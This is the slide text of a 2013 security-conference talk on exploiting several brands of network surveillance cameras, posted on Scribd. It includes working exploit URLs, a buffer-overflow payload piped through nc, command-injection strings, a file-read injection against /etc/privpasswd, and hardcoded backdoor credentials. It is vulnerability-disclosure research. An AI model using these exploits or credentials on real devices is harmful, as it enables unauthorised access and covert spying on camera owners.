Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • US 13 Heffner Exploiting Network Surveillance Cameras Like A Hollywood Hacker Slides

    Enviado por

    John
    141 visualizações120 páginas
    Surveillance

    Título original

    US 13 Heffner Exploiting Network Surveillance Cameras Like a Hollywood Hacker Slides

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    Surveillance

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    141 visualizações120 páginas

    US 13 Heffner Exploiting Network Surveillance Cameras Like A Hollywood Hacker Slides

    Enviado por

    John
    Surveillance

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 120

    Exploiting Surveillance Cameras

    Like a Hollywood Hacker


    Craig Heffner, Tactical Network Solutions

    Friday, July 12, 2013

    Introduction

    Embedded vulnerability analyst for Tactical Network Solutions

    Embedded Device Exploitation course instructor

    I do wireless stuff from time to time too

    Friday, July 12, 2013

    Objectives

    Analyze surveillance camera security

    Drop some 0-days

    Demo a true Hollywood-style hack

    Friday, July 12, 2013

    D-Link DCS-7410

    Friday, July 12, 2013

    Lighttpd Access Rules

    Friday, July 12, 2013

    What Isnt in the Access Rules?

    Friday, July 12, 2013

    rtpd.cgi

    Friday, July 12, 2013

    eval($QUERY_STRING)

    http://192.168.1.101/cgi-bin/rtpd.cgi?action=stop

    Friday, July 12, 2013

    Friday, July 12, 2013

    The Exploit (No, Seriously...)

    http://192.168.1.101/cgi-bin/rtpd.cgi?reboot

    Friday, July 12, 2013

    Grabing Admin Creds

    /cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Shodan Dork

    Friday, July 12, 2013

    CVE-2013-1599

    Disclosed by Core Security after talk submission

    Friday, July 12, 2013

    WVC80N

    Friday, July 12, 2013

    /img/snapshot.cgi

    Friday, July 12, 2013

    /adm/ez.cgi

    Friday, July 12, 2013

    strcpy(dest, QUERY_STRING)

    Friday, July 12, 2013

    Friday, July 12, 2013

    /img/snapshot.cgi?A*152

    Friday, July 12, 2013

    Where to Return?

    Friday, July 12, 2013

    Return to sub_9B88

    PAYLOAD=$(perl -e 'print "A"x148; print "\x88\x9B"')

    echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n"


    | nc 192.168.1.100 80

    Friday, July 12, 2013

    When Base64 Isnt Base64

    Friday, July 12, 2013

    BEST. USER GUIDE. EVER.

    Friday, July 12, 2013

    Decoded Config

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Shodan Dorks

    Friday, July 12, 2013

    Cisco PVC-2300

    Friday, July 12, 2013

    .htpasswd Protection

    Friday, July 12, 2013

    /usr/local/www/oamp

    Friday, July 12, 2013

    cgi_get_value(var_18, action)

    Friday, July 12, 2013

    Valid Actions

    downloadConfigurationFile

    uploadConfigurationFile

    updateFirmware

    loadFirmware

    ...

    Friday, July 12, 2013

    getenv(SESSIONID)

    Friday, July 12, 2013

    strcasecmp(login, action)

    Friday, July 12, 2013

    cgi_get_value(var_10, user)

    Friday, July 12, 2013

    cgi_get_value(var_10, password)

    Friday, July 12, 2013

    PRO_GetStr(OAMP, l1_usr, ...)

    Friday, July 12, 2013

    PRO_GetStr(OAMP, l1_pwd, ...)

    Friday, July 12, 2013

    strcmp(user, l1_usr)

    Friday, July 12, 2013

    strcmp(password, l1_pwd)

    Friday, July 12, 2013

    Where are l1_usr and l1_pwd?

    Friday, July 12, 2013

    Friday, July 12, 2013

    Getting a Session ID

    $ wget http://192.168.1.101/oamp/System.xml?
    action=login&user=L1_admin&password=L1_51

    Friday, July 12, 2013

    downloadConfigurationFile

    $ wget --header=sessionID: 57592414 \


    http://192.168.1.101/oamp/System.xml?\
    action=downloadConfigurationFile

    Friday, July 12, 2013

    When Base64 Isnt Base64

    Friday, July 12, 2013

    Non-Standard Key String

    Friday, July 12, 2013

    Decoded Config

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    action=loadFirmware

    Friday, July 12, 2013

    Friday, July 12, 2013

    pwned x2

    $ wget --header=sessionID: 57592414 \


    http://192.168.1.101/oamp/System.xml?\
    action=loadFirmware&url=https://127.0.0.1:65534/;reboot;

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Shodan Dork

    Friday, July 12, 2013

    IQInvision IQ832N

    Friday, July 12, 2013

    Default Unauth Video Feed

    Friday, July 12, 2013

    Admin Area Password Protected

    Friday, July 12, 2013

    oidtable.cgi

    Friday, July 12, 2013

    strstr(QUERY_STRING, grep=)

    Friday, July 12, 2013

    if(strlen(grep) < 32)

    Friday, July 12, 2013

    sprintf(grep -i %s...)

    Friday, July 12, 2013

    popen(grep -i %s...)

    Friday, July 12, 2013

    Friday, July 12, 2013

    Command Injection

    http://192.168.1.101/oidtable.cgi?grep='$IFS/tmp/a;ps;'

    grep -i /tmp/a;ps; /tmp/oidtable.html

    Friday, July 12, 2013

    Retrieving Arbitrary Files

    http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'

    grep -i /etc/privpasswd; /tmp/oidtable.html

    Friday, July 12, 2013

    Encrypted Admin Password

    Friday, July 12, 2013

    Decrypted Admin Password

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Shodan Dork

    jht

    Friday, July 12, 2013

    3SVision N5071

    Friday, July 12, 2013

    Restricted Firmware Download

    Friday, July 12, 2013

    Friday, July 12, 2013

    Use the Source, Luke

    Friday, July 12, 2013

    Literacy FTW

    Friday, July 12, 2013

    /home/3s/bin

    Friday, July 12, 2013

    pwdgrp_get_userinfo

    Friday, July 12, 2013

    Friday, July 12, 2013

    Hardest. Exploit. Ever.

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    pwned.

    Friday, July 12, 2013

    do_records

    Friday, July 12, 2013

    records.cgi?action=remove

    Friday, July 12, 2013

    strstr(cgi_parameters, &filename)

    Friday, July 12, 2013

    system(rm /mnt/sd/media/%s)

    Friday, July 12, 2013

    pwned x2

    $ wget \
    --user=3sadmin --password=27988303 \
    'http://192.168.1.101/records.cgi?\
    action=remove&storage=sd&filename=`reboot`'

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Also Affected

    Friday, July 12, 2013

    Shodan Dorks

    Friday, July 12, 2013

    So Basically...

    Im in your network.

    I can see you.

    And Im root.

    Friday, July 12, 2013

    Lets Turn This...

    Friday, July 12, 2013

    ...Into This.

    Friday, July 12, 2013

    Trendnet TV-IP410WN

    Friday, July 12, 2013

    Has a Backdoor Account

    productmaker:ftvsbannedcode

    Friday, July 12, 2013

    That Can Access These Files

    Friday, July 12, 2013

    Which Have Command Injection

    Friday, July 12, 2013

    That Can Be Trivially Exploited

    http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls

    system(/sbin/ptctrl ;ls)

    Friday, July 12, 2013

    By Anyone, Anywhere

    Friday, July 12, 2013

    Whats Old is New Again

    Vulnerability first published in 2011

    Report did not mention any specific devices

    Everyone ignored it...

    Friday, July 12, 2013

    Shodan Dork

    Friday, July 12, 2013

    Admins Video Feed

    Friday, July 12, 2013

    mjpg.cgi

    Friday, July 12, 2013

    Killing mjpg.cgi

    http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;kill$IFS-9$IFS379

    Friday, July 12, 2013

    Replacing mjpg.cgi

    #!/bin/sh
    echo -ne HTTP/1.1 200 OK\r\n Content-Type: image/jpeg\r\n\r\n
    cat /tmp/static_img.jpg

    Friday, July 12, 2013

    Admins Video Feed

    Friday, July 12, 2013

    Whats Really Happening

    Friday, July 12, 2013

    Demo Time!

    Friday, July 12, 2013

    Closing Thoughts

    Lots more bugs where these came from

    Cameras reveal their model number in the login prompt

    All exploits developed exclusively from firmware update files

    Binwalk + IDA + Qemu == WIN.

    Friday, July 12, 2013

    Contact

    cheffner@tacnetsol.com

    http://www.tacnetsol.com

    @devttys0

    http://www.devttys0.com/blog

    Friday, July 12, 2013

    Você também pode gostar